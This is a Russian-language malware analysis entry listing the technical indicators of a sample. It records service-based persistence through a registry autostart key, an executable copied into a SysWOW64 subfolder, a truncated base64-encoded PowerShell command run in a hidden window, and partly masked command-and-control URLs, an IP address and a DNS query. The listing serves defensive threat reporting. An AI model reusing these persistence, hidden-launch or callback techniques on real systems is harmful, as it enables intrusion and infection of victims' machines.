Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\KBDA3] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDA3] 'ImagePath' = '"%WINDIR%\SysWOW64\mfc120cht\KBDA3.exe"'
- 'KBDA3' "%WINDIR%\SysWOW64\mfc120cht\KBDA3.exe"
- 'KBDA3' %WINDIR%\SysWOW64\mfc120cht\KBDA3.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe
- %WINDIR%\syswow64\mfc120cht\kbda3.exe
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe в %WINDIR%\syswow64\mfc120cht\kbda3.exe
- '22#.#47.142.214':80
- http://th####seofpeace.org/cgi-bin/NZdfyylt/
- http://22#.#47.142.214/wHI6w/2Y0ODj8MIZf/
- DNS ASK th####seofpeace.org
- '%HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe'
- '%WINDIR%\syswow64\mfc120cht\kbda3.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)